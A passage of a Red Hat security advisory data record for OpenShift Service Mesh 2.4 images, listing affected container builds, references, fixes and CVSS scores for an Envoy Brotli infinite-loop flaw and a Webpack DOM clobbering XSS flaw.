"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-32976", }, { category: "external", summary: "RHBZ#2283145", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2283145", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-32976", url: "https://www.cve.org/CVERecord?id=CVE-2024-32976", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-32976", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-32976", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m", }, ], release_date: "2024-06-04T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:22:37+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7724", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "envoy: Brotli decompressor infinite loop", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:22:37+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7724", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: 